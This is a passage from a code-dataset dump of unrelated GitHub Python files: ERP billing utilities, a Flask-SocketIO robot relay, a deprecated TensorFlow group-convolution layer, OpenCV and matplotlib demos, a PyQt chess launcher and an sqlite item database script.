http_client.fetch(request)\n logging.info('\\treq_url=%s\\trequest_time=%s' % (r.effective_url, r.request_time))\n return r\n\nasync def async_common_api(path, params={}):\n url = url_concat(COMMON_URL + path, params)\n http_client = get_async_client()\n try:\n request = http_request(url)\n response = await fetch(http_client, request)\n response = json.loads(response.body.decode())\n return response\n except Exception as e:\n logging.error('url=%s, error=%s' % (url, e))\n raise APIError(errcode=10001, errmsg='公共接口请求失败')\n\ndef common_api(path, params={}):\n url = url_concat(COMMON_URL + path, params)\n http_client = httpclient.HTTPClient()\n try:\n request = http_request(url)\n response = http_client.fetch(request)\n response = json.loads(response.body.decode())\n return response\n except Exception as e:\n logging.error('url=%s, error=%s' % (url, e))\n raise APIError(errcode=10001, errmsg='公共接口请求失败')\n finally:\n http_client.close()\n\ndef common_post_api(path, params={}, method='POST'):\n url = COMMON_URL + path\n http_client = httpclient.HTTPClient()\n try:\n request = http_request(url, method=method, body=json.dumps(params))\n response = http_client.fetch(request)\n response = json.loads(response.body.decode())\n return response\n except Exception as e:\n logging.error('url=%s, error=%s' % (url, e))\n raise APIError(errcode=10001, errmsg='公共接口请求失败')\n finally:\n http_client.close()\n\ndef seconds_to_midnight():\n now = time.localtime()\n drawn = time.mktime(now[:3] + (0, 0, 0) + now[6:])\n return int(drawn + 86400 - time.time())\n\ndef is_valid_date(date_str):\n if not date_str:\n return True\n try:\n time.strptime(date_str, '%Y-%m-%d')\n return True\n except:\n return False\n\ndef is_valid_time(time_str):\n if not time_str:\n return True\n try:\n time.strptime(time_str, '%H:%M')\n return True\n except:\n return False\n\ndef is_valid_day_value(day_str):\n if not day_str:\n return True\n try:\n days = day_str.split(',')\n for day in days:\n if int(day) > 7 or int(day) < 1:\n return False\n except:\n return False\n else:\n return True\n\ndef is_valid_rt_ids_value(rt_ids_str):\n if not rt_ids_str:\n return True\n try:\n rt_ids = rt_ids_str.split(',')\n for rt_id in rt_ids:\n int(rt_id)\n except:\n return False\n else:\n return True\n\ndef is_ip_address(address):\n if not address:\n return True\n try:\n IPy.IP(address)\n return True\n except:\n return False\n\ndef get_day_of_week(day=None):\n '''\n 取值1-7,对应周一至周日\n '''\n day = day if day else when.today()\n return day.weekday() + 1\n\ndef is_valid_pack(pack, today=None):\n today = today if today else when.today()\n valid_days = [int(day) for day in pack['day'].split(',')]\n day = get_day_of_week(today)\n\n if pack['state'] == STATE['valid'] and pack['start_date'] <= today <= pack['end_date'] and day in valid_days:\n return True\n\n return False\n\ndef future_time_by_hour(st, hour, format='HH:mm'):\n st = arrow.get(st, format)\n ed = st.replace(hours=hour)\n\n return ed.format(format)\n\ndef future_time_by_minute(st, minute, format='HH:mm'):\n st = arrow.get(st, format)\n ed = st.replace(minutes=minute)\n\n return ed.format(format)\n\ndef minute_distance(time_str_1, time_str_2):\n return (arrow.get(time_str_2, 'HH:mm') - arrow.get(time_str_1, 'HH:mm')).seconds / 60\n\ndef is_valid_fees(fees, store_st, store_ed):\n '''\n 判断是否是有效的计费时段设置\n fees:某天全部计费时段\n store_st:商户营业开始时间\n store_ed:商户营业结束时间\n '''\n cfees = copy.deepcopy(fees)\n if not cfees:\n return False\n\n for f in cfees:\n if f['st'] < store_st:\n h, m = f['st'].split(':')\n f['st'] = '%s:%s'%(24+int(h), m)\n if f['ed'] <= store_st:\n h, m = f['ed'].split(':')\n f['ed'] = '%s:%s'%(24+int(h), m)\n\n if store_ed <= store_st:\n h, m = store_ed.split(':')\n store_ed = '%s:%s'%(24+int(h), m)\n\n cfees = sorted(cfees, key=lambda f: f['st'])\n\n start_st = cfees[0]['st']\n end_ed = cfees[len(cfees) - 1]['ed']\n\n if start_st != store_st or end_ed != store_ed:\n return False\n\n for index, fee in enumerate(cfees[1:]):\n st = fee['st']\n last_ed = cfees[index]['ed']\n if st != last_ed:\n return False\n\n return True\n\ndef is_hour_in_range(hour, start, end, tp='st'):\n # if start == end:\n # raise APIError(errcode=50001, errmsg='计费方式设置有误')\n if start < end:\n if tp == 'st':\n if start <= hour < end:\n return True\n else:\n if start < hour <= end:\n return True\n\n return False\n\n if tp == 'st':\n if start <= hour < '24:00' or '00:00' <= hour < end:\n return True\n else:\n if start < hour < '24:00' or '00:00' <= hour <= end:\n return True\n\n return False\n\ndef get_time_bills(fees, st, ed):\n st = st[-5:]\n ed = ed[-5:]\n st_index = -1\n ed_index = -1\n\n for index, fee in enumerate(fees):\n if is_hour_in_range(st, fee['st'], fee['ed']):\n st_index = index\n if is_hour_in_range(ed, fee['st'], fee['ed'], 'ed'):\n ed_index = index\n\n if st_index == -1 or ed_index == -1:\n raise APIError(errcode=50001, errmsg='开台时间或关台时间设置有误')\n\n bills = []\n\n if st_index == ed_index:\n fee = fees[st_index]\n\n fee_id = fee['id']\n minute = minute_distance(st, ed)\n money_minute = int(fee['fee'] / 60)\n money = int(minute * fee['fee'] / 60)\n\n bills.append({\n 'st': st,\n 'ed': ed,\n 'fee_id': fee_id,\n 'minute': minute,\n 'money_minute': money_minute,\n 'money': money\n })\n\n elif ed_index > st_index:\n\n for index in range(st_index, ed_index + 1):\n fee = fees[index]\n fee_id = fee['id']\n\n if index == st_index:\n gen_st = st\n gen_ed = fee['ed']\n elif index == ed_index:\n gen_st = fee['st']\n gen_ed = ed\n else:\n gen_st = fee['st']\n gen_ed = fee['ed']\n\n minute = minute_distance(gen_st, gen_ed)\n money_minute = int(fee['fee'] / 60)\n money = int(minute * fee['fee'] / 60)\n\n bills.append({\n 'st': gen_st,\n 'ed': gen_ed,\n 'fee_id': fee_id,\n 'minute': minute,\n 'money_minute': money_minute,\n 'money': money\n })\n\n return bills\n\ndef gen_order_no():\n return when.now().strftime('%Y%m%d%H%M%S') + str(random.randint(0, 99)).zfill(2)\n\ndef gen_bill_no(prefix):\n return prefix + gen_order_no()\n\ndef get_pay_state(pay_type):\n pay_state = BILL_PAY_STATE['pay'] if pay_type == PAY_TYPE['current'] else BILL_PAY_STATE['unpay']\n return pay_state\n\ndef get_bill_pay_state(pay_md):\n '''支付方式如果是现金, 则是已支付'''\n if pay_md in (PAY_MD['cash'], PAY_MD['pos']):\n return BILL_PAY_STATE['pay']\n return BILL_PAY_STATE['unpay']\n\ndef get_today_start_end_time(st, ed):\n today = when.today()\n format_str = '%s %s'\n\n if st < ed:\n st_time_str = format_str % (today, st)\n ed_time_str = format_str % (today, ed)\n\n return st_time_str, ed_time_str\n\n tomorrow = when.tomorrow()\n st_time_str = format_str % (today, st)\n ed_time_str = format_str % (tomorrow, ed)\n\n return st_time_str, ed_time_str\n\ndef get_yesterday_start_end_time(st, ed):\n yesterday = when.yesterday()\n format_str = '%s %s'\n\n if st < ed:\n st_time_str = format_str % (yesterday, st)\n ed_time_str = format_str % (yesterday, ed)\n\n return st_time_str, ed_time_str\n\n today = when.today()\n st_time_str = format_str % (yesterday, st)\n ed_time_str = format_str % (today, ed)\n\n return st_time_str, ed_time_str\n\ndef get_7days_start_end_time(st, ed):\n today = when.today()\n seven_days_ago = when.past(days=7).date()\n format_str = '%s %s'\n\n if st < ed:\n st_time_str = format_str % (seven_days_ago, st)\n ed_time_str = format_str % (today, ed)\n\n return st_time_str, ed_time_str\n\n tomorrow = when.tomorrow()\n st_time_str = format_str % (seven_days_ago, st)\n ed_time_str = format_str % (tomorrow, ed)\n\n return st_time_str, ed_time_str\n\ndef get_30days_start_end_time(st, ed):\n today = when.today()\n thirty_days_ago = when.past(days=30).date()\n format_str = '%s %s'\n\n if st < ed:\n st_time_str = format_str % (thirty_days_ago, st)\n ed_time_str = format_str % (today, ed)\n\n return st_time_str, ed_time_str\n\n tomorrow = when.tomorrow()\n st_time_str = format_str % (thirty_days_ago, st)\n ed_time_str = format_str % (tomorrow, ed)\n\n return st_time_str, ed_time_str\n\ndef get_range_start_end_time(start_day, end_day, st, ed):\n format_str = '%s %s'\n start_day = start_day.date()\n\n if st < ed:\n st_time_str = format_str % (start_day, st)\n ed_time_str = format_str % (end_day.date(), ed)\n\n return st_time_str, ed_time_str\n\n end_day = end_day.replace(days=1)\n st_time_str = format_str % (start_day, st)\n ed_time_str = format_str % (end_day.date(), ed)\n\n return st_time_str, ed_time_str\n\ndef check_if_success_bill(pay_type, pay_md):\n return pay_type == PAY_TYPE['poster'] or pay_md in (PAY_MD['cash'], PAY_MD['pos'])\n\ndef export_xlsx(data, export_filename):\n '''\n data = [\n {'sheetname': 'sheet1', titles: ['title_1', 'title_2', 'title_3'], data: [[1,2,3], [2,3,4], [3,4,5]]},\n {'sheetname': 'sheet2', titles: ['title_1', 'title_1', 'title_1'], data: [[1,2,3], [2,3,4], [3,4,5]]}\n ]\n data是数组,如果长度大于1,则有多少个sheet\n '''\n assert isinstance(data, list)\n wb = openpyxl.Workbook()\n alignment = Alignment(wrap_text=True)\n ws_num = len(data)\n wss = []\n max_len = [] # 是数组的数组: [[], [], []], 记录每一个sheet, 每一列的最大长度, 导出时, 显示更正常\n for i in range(ws_num):\n if i == 0:\n ws = wb.active # 第一个sheet是这么取的, 如果直接create_sheet, 生成的第一个sheet是空的\n ws.title = data[i].get('sheetname', '')\n else:\n ws = wb.create_sheet(data[i].get('sheetname', ''))\n for idx, title in enumerate(data[i].get('titles', [])):\n col = ord('A') + idx\n ws['%s1' % chr(col)] = title # 写入标题\n # 初始化每一个sheet的每一列最大宽度为这个列名(汉字)的长度\n max_len.append([len(bytes(str(title), 'GBK')) for title in data[i].get('titles', [])])\n wss.append(ws)\n for idx, ws in enumerate(wss):\n data_lines = data[idx].get('data', [])\n for line, data_line in enumerate(data_lines):\n for col, data_col in enumerate(data_line):\n cur_col = ord('A') + col\n data_col = str(data_col)\n ws['%s%s' % (chr(cur_col), line+2)] = data_col\n ws['%s%s' % (chr(cur_col), line+2)].alignment = alignment\n if len(bytes(data_col, 'GBK')) > max_len[idx][col]:\n max_len[idx][col] = len(bytes(data_col, 'GBK'))\n for colidx in range(len(data[idx].get('titles', []))):\n cur_col = ord('A') + colidx\n ws.column_dimensions['%s' % chr(cur_col)].width = max_len[idx][colidx]\n wb.save('%s' % export_filename)\n\ndef is_success_pay(tp, res):\n\n if int(res['errcode']) != 200:\n return False\n\n if ((tp=='ali' and\n (res.get('trade_status') == 'TRADE_SUCCESS') or\n int(res.get('code', 0))==10000) or\n (tp == 'wx' and\n res.get('return_code') == 'SUCCESS' and\n res.get('result_code') == 'SUCCESS' and\n res.get('trade_state') == 'SUCCESS')):\n return True\n\n return False\n","repo_name":"y00273676/O2O_ERP_Server","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35210879751","text":"from flask import Flask, render_template\nfrom flask_socketio import SocketIO\nfrom flask_socketio import send, emit\nimport json\n\n\nLOG_LEVEL = 0 # 0=debug, 1=info, 3=warn, 4=error\nPRINT_LOG_WEBSOCKET = False # True will print log lines over websocket connection\nHOST = \"x.x.x.x\"\nPORT = 5000\n\n\napp = Flask(__name__)\nsocketio = SocketIO(app, logger=False)\n\n@app.route('/')\ndef root():\n return app.send_static_file('index.html')\n\n@socketio.on('robot')\ndef handle_robot_message(message):\n try:\n jsonMsg = json.loads(message)\n except:\n log(2,\"Could not parse JSON: {0}\".format(message))\n return\n\n # Parse and handle know message types\n if 'LOG' in jsonMsg and PRINT_LOG_WEBSOCKET:\n log(0, \"Robot LOG ({0}): {1}\".format(jsonMsg['LOG']['weight'], jsonMsg['LOG']['message']))\n if 'ECHO' in jsonMsg:\n # 'ECHO' is an API test. Do we have a connection?\n send_to_webclient({'received_over_channel':\"robot\",'original_msg':jsonMsg['ECHO']})\n #TODO handle more message types\n\n\n@socketio.on('webcl')\ndef handle_webclient_message(message):\n try:\n jsonMsg = json.loads(message)\n except:\n log(2,\"Could not parse JSON: {0}\".format(message))\n return\n\n # Parse and handle know message types\n if 'ROBOT' in jsonMsg:\n # 'ROBOT' is a type of message containing \n # information to be directly relayed to bot\n send_to_robot(jsonMsg['ROBOT'])\n if 'ECHO' in jsonMsg:\n # 'ECHO' is an API test. Do we have a connection?\n send_to_webclient({'received_over_channel':\"webcl\",'original_msg':jsonMsg['ECHO']})\n\n\n\ndef send_to_robot(message):\n \"\"\" Sends given message to connected robot\n Encodes message to JSON string\n Does not check for command validity\n \"\"\"\n try:\n msgStr = json.dumps(message)\n except:\n log(2,\"Could not convert message to JSON string: {0}\".format(message))\n return\n\n try:\n log(0,\"Msg to Robot: {0}\".format(msgStr))\n emit('robot', msgStr, broadcast=True)\n except:\n log(2,\"Could not communicate to robot: {0}\".format(msgStr))\n\n\ndef send_to_webclient(message):\n \"\"\" Sends given message to connected web client\n Encodes message to JSON string\n Does not check for command validity\n \"\"\"\n try:\n msgStr = json.dumps(message)\n except:\n log(2,\"Could not convert message to JSON string: {0}\".format(message))\n return\n\n try:\n log(0,\"Msg to WebCl: {0}\".format(msgStr))\n emit('webcl', msgStr, broadcast=True)\n except:\n log(2,\"Could not communicate to web client: {0}\".format(msgStr))\n\n\ndef log(level, msg):\n \"\"\" Print to sysout depending on given log level\n \n Logs when level>=LOG_LEVEL\n\n 0=debug\n 1=info\n 2=warn\n 3=error\n \"\"\"\n weight = \"?\"\n if level>=LOG_LEVEL:\n if level == 0:\n weight = \"DEBUG\"\n elif level == 1:\n weight = \"INFO\"\n elif level == 2:\n weight = \"WARN\"\n elif level == 3:\n weight = \"ERROR\"\n else:\n log(3, \"Invalid log level: {0}\".format(level))\n print(\"{0}: {1}\".format(weight, msg))\n\n\nif __name__ == '__main__':\n socketio.debug = True\n socketio.run(app, host=HOST, port=PORT)","repo_name":"HyHend/ArPiBot","sub_path":"arduino_rpi_server/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29442139622","text":"'''\n################################################################\n# Layers - Modern convolutional layers (deprecated)\n# @ Modern Deep Network Toolkits for Tensorflow-Keras\n# Yuchen Jin @ cainmagi@gmail.com\n# Requirements: (Pay attention to version)\n# python 3.6+\n# tensorflow r1.13+\n# We store the failed versions of APIs for .conv here.\n# Version: 0.10 # 2019/6/7\n# Comments:\n# A failed try for quick group convolution (QGroupConv), move\n# it to deprecated.\n################################################################\n'''\n\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.keras import activations\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras import constraints\nfrom tensorflow.python.keras import initializers\nfrom tensorflow.python.keras import regularizers\nfrom tensorflow.python.keras.utils import conv_utils\nfrom tensorflow.python.keras.engine.base_layer import Layer\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import nn\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import nn_impl\nfrom tensorflow.python.ops import math_ops\n\nfrom tensorflow.keras.layers import BatchNormalization, LeakyReLU, PReLU\nfrom tensorflow.python.keras.layers.convolutional import Conv, Conv2DTranspose, Conv3DTranspose, UpSampling1D, UpSampling2D, UpSampling3D, ZeroPadding1D, ZeroPadding2D, ZeroPadding3D, Cropping1D, Cropping2D, Cropping3D\nfrom .normalize import InstanceNormalization, GroupNormalization\n\nfrom .. import compat\nif compat.COMPATIBLE_MODE['1.12']:\n from tensorflow.python.keras.engine.base_layer import InputSpec\nelse:\n from tensorflow.python.keras.engine.input_spec import InputSpec\n\nNEW_CONV_TRANSPOSE = True\nUSE_QUICK_GCONV = False\n\ndef _get_macro_conv(key='NEW_CONV_TRANSPOSE'):\n if key == 'USE_QUICK_GCONV':\n return USE_QUICK_GCONV\n else:\n return NEW_CONV_TRANSPOSE\n\nclass _QGroupConv(_GroupConv):\n \"\"\"Quick computing version for abstract nD group convolution layer.\n This is the quick computing version of the convolution.\n The work flow of `GroupConv` could be viewed as\n output = concat (i=1~G) ( convND(input[group_i]) )\n which means if we have G groups, we need to compute the `convND` op for G times.\n The original implementation calls operator `convND` for many times, which is\n inefficient. To solve this problem, we use such a work flow:\n output = sum (i=1~G) ( depth_convND(input)[group_i] )\n The difference is, we only need to call `depth_convND` (tf.nn.depthwise_conv2d) \n once. Furthermore, if we apply tf.reshape and tf.sum, we could also calculate \n the sum operator once. This is why we could use the above method to improve the\n efficiency.\n However, since there is only tf.nn.depthwise_conv2d in tensorflow, we could not\n use it to calculate GroupConv3D. But we could still calculate GroupConv1D by\n reducing the 2D convolution to 1D case.\n To learn more about group convolution, see the docstring for `GroupConv`.\n Arguments:\n rank: An integer, the rank of the convolution, e.g. \"2\" for 2D convolution.\n (rank > 2 is not allowed.)\n lgroups: Integer, the group number of the latent convolution branch. The\n number of filters in the whole latent space is lgroups * lfilters.\n lfilters: Integer, the dimensionality in each the lattent group (i.e. the\n number of filters in each latent convolution branch).\n kernel_size: An integer or tuple/list of n integers, specifying the\n length of the convolution window.\n strides: An integer or tuple/list of n integers,\n specifying the stride length of the convolution.\n Specifying any stride value != 1 is incompatible with specifying\n any `dilation_rate` value != 1.\n padding: One of `\"valid\"` or `\"same\"` (case-insensitive).\n data_format: A string, one of `channels_last` (default) or `channels_first`.\n The ordering of the dimensions in the inputs.\n `channels_last` corresponds to inputs with shape\n `(batch, ..., channels)` while `channels_first` corresponds to\n inputs with shape `(batch, channels, ...)`.\n dilation_rate: An integer or tuple/list of n integers, specifying\n the dilation rate to use for dilated convolution.\n Currently, specifying any `dilation_rate` value != 1 is\n incompatible with specifying any `strides` value != 1.\n activation: Activation function. Set it to None to maintain a\n linear activation.\n use_bias: Boolean, whether the layer uses a bias.\n kernel_initializer: An initializer for the convolution kernel.\n bias_initializer: An initializer for the bias vector. If None, the default\n initializer will be used.\n kernel_regularizer: Optional regularizer for the convolution kernel.\n bias_regularizer: Optional regularizer for the bias vector.\n activity_regularizer: Optional regularizer function for the output.\n kernel_constraint: Optional projection function to be applied to the\n kernel after being updated by an `Optimizer` (e.g. used to implement\n norm constraints or value constraints for layer weights). The function\n must take as input the unprojected variable and must return the\n projected variable (which must have the same shape). Constraints are\n not safe to use when doing asynchronous distributed training.\n bias_constraint: Optional projection function to be applied to the\n bias after being updated by an `Optimizer`.\n trainable: Boolean, if `True` also add variables to the graph collection\n `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n name: A string, the name of the layer.\n \"\"\"\n\n def __init__(self, rank,\n lgroups,\n lfilters,\n kernel_size,\n strides=1,\n padding='valid',\n data_format=None,\n dilation_rate=1,\n activation=None,\n use_bias=True,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n trainable=True,\n name=None,\n **kwargs):\n super(_GroupConv, self).__init__(\n trainable=trainable,\n name=name,\n activity_regularizer=regularizers.get(activity_regularizer),\n **kwargs)\n self.rank = rank\n if rank > 2:\n raise ValueError('The quick group convolution does not support 3D or any higher dimension.')\n initRank = rank\n self.lgroups = lgroups\n self.lfilters = lfilters\n self.kernel_size = conv_utils.normalize_tuple(\n kernel_size, rank, 'kernel_size')\n self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')\n self.padding = conv_utils.normalize_padding(padding)\n if (self.padding == 'causal' and not isinstance(self, (Conv1D, SeparableConv1D))):\n raise ValueError('Causal padding is only supported for `Conv1D` and ``SeparableConv1D`.')\n self.data_format = conv_utils.normalize_data_format(data_format)\n self.dilation_rate = conv_utils.normalize_tuple(\n dilation_rate, rank, 'dilation_rate')\n if rank == 1: # when rank=1, expand the tuples to 2D case.\n self.kernel_size = (1, *self.kernel_size)\n self.strides = (1, *self.strides)\n self.dilation_rate = (1, *self.dilation_rate)\n self.activation = activations.get(activation)\n self.use_bias = use_bias\n self.kernel_initializer = initializers.get(kernel_initializer)\n self.bias_initializer = initializers.get(bias_initializer)\n self.kernel_regularizer = regularizers.get(kernel_regularizer)\n self.bias_regularizer = regularizers.get(bias_regularizer)\n self.kernel_constraint = constraints.get(kernel_constraint)\n self.bias_constraint = constraints.get(bias_constraint)\n self.input_spec = InputSpec(ndim=self.rank + 2)\n\n self.group_input_dim = None\n self.exp_dim_pos = None\n\n def build(self, input_shape):\n input_shape = tensor_shape.TensorShape(input_shape)\n if self.data_format == 'channels_first':\n channel_axis = 1\n self._data_format = 'NCHW'\n if self.rank == 1:\n self.exp_dim_pos = 2\n else:\n channel_axis = -1\n if self.rank == 1:\n self.exp_dim_pos = 1\n self._data_format = 'NHWC'\n if input_shape.dims[channel_axis].value is None:\n raise ValueError('The channel dimension of the inputs should be defined. Found `None`.')\n input_dim = int(input_shape[channel_axis])\n if input_dim % self.lgroups != 0:\n raise ValueError('To grouplize the input channels, the input channel number should be a multiple of group number (N*{0}), but given {1}'.format(self.lgroups, input_dim))\n self.group_input_dim = input_dim // self.lgroups\n self._strides = (1, *self.strides, 1)\n kernel_shape = self.kernel_size + (input_dim, self.lfilters)\n\n self.kernel = self.add_weight(\n name='kernel',\n shape=kernel_shape,\n initializer=self.kernel_initializer,\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint,\n trainable=True,\n dtype=self.dtype)\n if self.use_bias:\n self.bias = self.add_weight(\n name='bias',\n shape=(self.lfilters * self.lgroups,),\n initializer=self.bias_initializer,\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint,\n trainable=True,\n dtype=self.dtype)\n else:\n self.bias = None\n self.input_spec = InputSpec(ndim=self.rank + 2, axes={channel_axis: input_dim})\n if self.padding == 'causal':\n self.op_padding = 'valid'\n else:\n self.op_padding = self.padding\n self.built = True\n\n def call(self, inputs):\n if self.rank == 1:\n inputs = array_ops.expand_dims(inputs, axis=self.exp_dim_pos)\n outputs= nn_impl.depthwise_conv2d(input=inputs,\n filter=self.kernel,\n strides=self._strides,\n padding=self.op_padding.upper(),\n rate=self.dilation_rate,\n data_format=self._data_format)\n # Grouplize the output channels.\n r2_outputs_shape = outputs.get_shape().as_list()\n if self.data_format == 'channels_first':\n #get_oshape = r2_outputs_shape[:1].concatenate([self.lgroups*self.lfilters, self.group_input_dim]).concatenate(r2_outputs_shape[2:])\n get_oshape = [-1, self.lgroups*self.lfilters, self.group_input_dim, *r2_outputs_shape[2:]]\n outputs = array_ops.reshape(outputs, get_oshape)\n outputs = math_ops.reduce_sum(outputs, axis=1, keepdims=False)\n else:\n #get_oshape = r2_outputs_shape[:-1].concatenate([self.lgroups*self.lfilters, self.group_input_dim])\n get_oshape = [-1, *r2_outputs_shape[1:-1], self.lgroups*self.lfilters, self.group_input_dim]\n outputs = array_ops.reshape(outputs, get_oshape)\n outputs = math_ops.reduce_sum(outputs, axis=-1, keepdims=False)\n if self.rank == 1:\n outputs = array_ops.squeeze(outputs, axis=self.exp_dim_pos)\n outputs_list = []\n\n if self.use_bias:\n if self.data_format == 'channels_first':\n if self.rank == 1:\n # nn.bias_add does not accept a 1D input tensor.\n bias = array_ops.reshape(self.bias, (1, self.lfilters * self.lgroups, 1))\n outputs += bias\n if self.rank == 2:\n outputs = nn.bias_add(outputs, self.bias, data_format='NCHW')\n else:\n outputs = nn.bias_add(outputs, self.bias, data_format='NHWC')\n\n if self.activation is not None:\n return self.activation(outputs)\n return outputs","repo_name":"cainmagi/MDNT","sub_path":"layers/deprecated/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":12722,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"41851978649","text":"import cv2 as cv\nimport numpy as np\n\n\n## Function to draw a rectangule on mouse event\ndef click_event(event, x, y, flags, params):\n if event == cv.EVENT_LBUTTONDOWN:\n rectangule['x1'] = x\n rectangule['y1'] = y\n \n if event == cv.EVENT_LBUTTONUP:\n cv.rectangle(img, (rectangule['x1'], rectangule['y1']), (x, y), (255, 255, 255))\n cv.imshow('img', img)\n\n## Initial image and retangule position\nimg = np.zeros((600, 600, 3), np.uint8)\nrectangule = { 'x1': 0, 'y1': 0, 'x2': 0, 'y2': 0 }\n\n## Open window and wait to draw retangule\ncv.imshow('img', img)\ncv.setMouseCallback('img', click_event)\n\n## Waiting any button press to exit\ncv.waitKey(0)\ncv.destroyAllWindows()","repo_name":"natansilva/opencv_examples","sub_path":"02_mouse_event.py","file_name":"02_mouse_event.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27439297587","text":"## \n## highs_lows.py\n## @ianpasm(kno30826@gmail.com)\n## 2018-03-22 11:05:43\n## \n \n#!/usr/bin/env python3\n# coding=utf-8\n\nimport csv\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime\n\n#fetch date and the highest temperature from file\n#filename = 'sitka_weather_2014.csv'\nfilename = 'death_valley_2014.csv'\nwith open(filename) as f:\n reader = csv.reader(f)\n header_row = next(reader)\n\n dates,highs,lows = [],[],[]\n for row in reader:\n try:\n current_date = datetime.strptime(row[0],\"%Y-%m-%d\")\n high = int(row[1])\n low = int(row[3])\n except ValueError:\n print(current_date,'missing data')\n else: \n dates.append(current_date)\n highs.append(high)\n lows.append(low)\n #print(highs)\n\n #for index,column_header in enumerate(header_row):\n # print(index,column_header)\n\n# drawing graphic based on data\nfig = plt.figure(dpi=128,figsize=(10,6))\nplt.plot(dates,highs,c='red',alpha=0.5)\nplt.plot(dates,lows,c='blue',alpha=0.5)\nplt.fill_between(dates,highs,lows,facecolor='blue',alpha=0.1)\n\n#set style\ntitle = \"Daily high and low tempertures - 2014\\nDeath Valley,CA\"\nplt.title(title,fontsize=20)\nplt.xlabel('',fontsize=16)\nfig.autofmt_xdate()\nplt.ylabel(\"Temperture (F)\",fontsize=16)\nplt.tick_params(axis='both',which='major',labelsize=16)\n\nplt.show()\n\n\n\n\n","repo_name":"i0Ek3/PythonCrashCourse","sub_path":"code/part2/proj2/data_visualization/highs_lows.py","file_name":"highs_lows.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38123837555","text":"import sys, yaml\n\nfrom PyQt5 import *\nfrom PyQt5.QtWidgets import QApplication\n\nfrom .QtCChessMain import *\n\n#-----------------------------------------------------#\nclass QChessApp(QApplication):\n def __init__(self):\n super().__init__([])\n \n self.config = None\n \n self.mainWin = MainWindow(self)\n self.mainWin.show()\n \n def loadConfig(self):\n with open(APP_CONFIG_FILE) as f:\n try:\n self.config = yaml.load(f, Loader=yaml.FullLoader)\n except Exception as e:\n QMessageBox.warning(self, APP_NAME,\n APP_CONFIG_FILE + \" 配置文件错误:\" + str(e))\n self.config = None\n return\n \n \n\n#-----------------------------------------------------#\ndef run():\n app = QChessApp()\n sys.exit(app.exec_())\n ","repo_name":"walker8088/ChessQ","sub_path":"qtcchess/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"40"} +{"seq_id":"74571818999","text":"import sys\nimport os\n\nimport sqlite3\n\nconn = None\nc = None\n\ndef init_db():\n global conn\n global c\n\n # create data directory\n data_dir = \"./data\"\n if not os.path.isdir(data_dir):\n os.makedirs(data_dir)\n if not os.path.isdir(data_dir):\n print(\"Failed to create data path '{}'\".format(data_dir))\n return\n\n # open db\n #print(\"#### Opening database '{}'\".format(\"./data/data.db\"))\n conn = sqlite3.connect(\"./data/data.db\")\n\n # get cursor\n c = conn.cursor()\n\n # create table items\n c.execute('''\n SELECT name FROM sqlite_master\n WHERE type='table' AND name='items'\n ''')\n if c.fetchone() == None:\n #print(\"#### Creating table '{}' in database\".format('items'))\n c.execute('''\n CREATE TABLE items (\n name TEXT PRIMARY KEY NOT NULL,\n bunch INTEGER NOT NULL,\n descript TEXT NOT NULL)\n ''')\n\n # create table depends\n c.execute('''\n SELECT name FROM sqlite_master\n WHERE type='table' AND name='depends'\n ''')\n if c.fetchone() == None:\n #print(\"#### Creating table '{}' in database\".format('depends'))\n c.execute('''\n CREATE TABLE depends (\n name TEXT NOT NULL,\n depend_name TEXT NOT NULL,\n depend_bunch INTEGER NOT NULL)\n ''')\n\ndef assert_item_exists(name):\n global conn\n global c\n\n c.execute('''\n SELECT name FROM items \n WHERE name='{}'\n '''.format(name))\n if c.fetchone() == None:\n print(\"Item '{}' does not exist in database\".format(name))\n exit(-1)\n\ndef assert_item_not_exist(name):\n global conn\n global c\n\n c.execute('''\n SELECT name FROM items \n WHERE name='{}'\n '''.format(name))\n if c.fetchone() != None:\n print(\"Item '{}' already exists in database\".format(name))\n exit(-1)\n\n# remove existing depends of item if --force is specified in options\ndef remove_existing_item(name):\n global conn\n global c\n\n print(\"#### Remove item '{}' from table items in database\".format(name))\n # remove item\n c.execute('''\n DELETE FROM items\n WHERE name='{}'\n '''.format(name))\n\n print(\"#### Remove item '{}' from table depends in database\".format(name))\n # remove depends of item\n c.execute('''\n DELETE FROM depends\n WHERE name='{}'\n '''.format(name))\n\ndef add_item(args):\n global conn\n global c\n\n # add item\n print(\"#### Adding item '{}' to table items in database\".format(args['name']))\n c.execute('''\n INSERT INTO items\n (name, bunch, descript)\n VALUES('{}', '{}', '{}')\n '''.format(args['name'], args['bunch'], args['descript']))\n\n # add item depends\n for x in args['depend']:\n print(\"#### Add depend '{}' <- '{}' to table depends in database\".format(args['name'], x[0]))\n c.execute('''\n INSERT INTO depends\n (name, depend_name, depend_bunch)\n VALUES('{}', '{}', '{}')\n '''.format(args['name'], x[0], x[1]))\n\ndef close_db():\n global conn\n global c\n\n # commit connection changes\n conn.commit()\n\n # close cursor and db\n #print(\"#### Closing database\")\n c.close()\n conn.close()\n\ndef list_items():\n global conn\n global c\n\n c.execute(\"SELECT name FROM items\")\n\n items = list()\n row = 